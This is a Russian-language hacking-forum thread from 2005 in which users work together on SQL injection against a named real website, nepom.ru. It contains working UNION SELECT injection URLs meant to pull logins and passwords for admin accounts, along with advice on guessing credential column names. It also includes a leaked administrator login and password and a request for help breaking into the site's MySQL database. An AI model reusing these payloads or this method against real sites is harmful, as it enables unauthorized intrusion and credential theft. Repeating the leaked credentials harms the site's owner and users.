Sql иньекция в nepom.ru

Discussion in 'Уязвимости' started by Thief, 4 Oct 2005.

  1. Thief

    Thief Elder - Старейшина

    Joined:
    3 Aug 2004
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Коротко и ясно уязвимость обнаружел на http://nepom.ru/users/?login=' Далее не могу понять как открыть таблицы Вродебы пишу всё правильно.
    Пример http://nepom.ru/users/?login=-1 UNION SELECTnull,U_Password,null,null,null FROM w3t Users WHERE U_Username='admin'/*
    ИТД помогите разобраться....
     
  2. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    280
    Likes Received:
    8
    Reputations:
    -1
    А от куда ты знаешь имена таблиц?
     
  3. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
    1. У тебя неправильный синтаксис: после -1 нужно ставить ', а потом комментировать т.к. в запросе значение взято в кавычки.
    2. Ты выбираешь 5 столбцов, когда там нужно всего один.
    3. Нет вывода результата, поэтому посмотреть пароль не получится.
    Поэтому тебе нужно искать другую sql-инъекцию :)
    Если бы был вывод, правильный запрос был бы вот такой:
     
    1 person likes this.
  4. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
    Вот тебе настоящая sql-инъекция! :)
    Сейчас только логины менять ;)
     
    #4 virgoz, 4 Oct 2005
    Last edited: 4 Oct 2005
  5. Thief

    Thief Elder - Старейшина

    Joined:
    3 Aug 2004
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    SQL скорее всего не получиться... т.к. он выбирает id, а id скорее всего INTEGER, а пароль VARCHAR.... скорее всего... поэтому UNION не работает... выбор идет только по одному INTEGER полю
    Если вам не лень посмотрите может я ошибаюсь... Спасибо!
     
  6. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
    Вот так:
    !!! Когда будете вставлять, в слове "u sers" уберите пробел :)
     
    #6 virgoz, 4 Oct 2005
    Last edited: 4 Oct 2005
  7. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
    Ххыхыхыхых хеш 123
     
  8. Thief

    Thief Elder - Старейшина

    Joined:
    3 Aug 2004
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    http://nepom.ru/interest/full.php?id=-1'+UNION+SELECT+1,2,login,id,passwd,6,7,8,9+FROM+users+where+login='ChatAdmin'/*
    Выполняю данный запрос 1 назад всё работоло сей час что-то не работает видать нашли багу. Ктонить может обьяснить что произошло.....
     
  9. Deem3n®

    Deem3n® RTFMSDN

    Joined:
    19 Sep 2005
    Messages:
    378
    Likes Received:
    153
    Reputations:
    164
    багу прикрыли

    а http://nepom.ru/users/?login=' еще работает
     
  10. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
  11. Thief

    Thief Elder - Старейшина

    Joined:
    3 Aug 2004
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
  12. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
    Продолжение следует :)
    http://nepom.ru/story/text.php?id=-1'+UNION+SELECT+1,2,3,login,passwd,6,7,8,9,10,11 FROM+users+where+login='ChatAdmin'/*
     
  13. Thief

    Thief Elder - Старейшина

    Joined:
    3 Aug 2004
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    virgoz -- благодарю только вот у меня вопрос как ты догадался что там есть login,passwd ............ Крутая иньекция получилась:)
     
  14. virgoz

    virgoz Elder - Старейшина

    Joined:
    16 Sep 2004
    Messages:
    151
    Likes Received:
    28
    Reputations:
    15
    login, passwd, uname, username, user, pass, password, pas - самые распостраненные имена для столбцов c паролями и логинами.
     
  15. Thief

    Thief Elder - Старейшина

    Joined:
    3 Aug 2004
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Вот на досуге полазал нашол следующее
    Administrator
    ytnvtyz
    Вообщем не без вашей помощи удалось добыть далее захожу и нахожу бд my sql... Вот только почемута не получается войти пароль может иной или доступ только по IP можете взглянуть может у вас чтонибуть выйдет........
     
  16. Deniska

    Deniska Elder - Старейшина

    Joined:
    27 Jul 2005
    Messages:
    36
    Likes Received:
    2
    Reputations:
    0
    Та же беда
    Не пускает.
     
  17. Thief

    Thief Elder - Старейшина

    Joined:
    3 Aug 2004
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Ну жаль скорее всего идёт проверка по Ip потому и не пускает мне в принципе прав админа хватает...
     
  18. Thief

    Thief Elder - Старейшина

    Joined:
    3 Aug 2004
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Здраствуйте снова был такой ресурс nepom.ru потом временно его не стало но сейчас он появился снова но пропатчиный но со старой дыркой http://nepom.ru/interest/?raz='
    Иньекцию не получается сделать никак, нет таких мозгов как virgoz Помогите...
     
  19. Deem3n®

    Deem3n® RTFMSDN

    Joined:
    19 Sep 2005
    Messages:
    378
    Likes Received:
    153
    Reputations:
    164
    http://nepom.ru/interest/?raz='
    Запрос SELECT `id` FROM `int` WHERE `raz`=''' не выполнен

    выбор идет только по одному INTEGER полю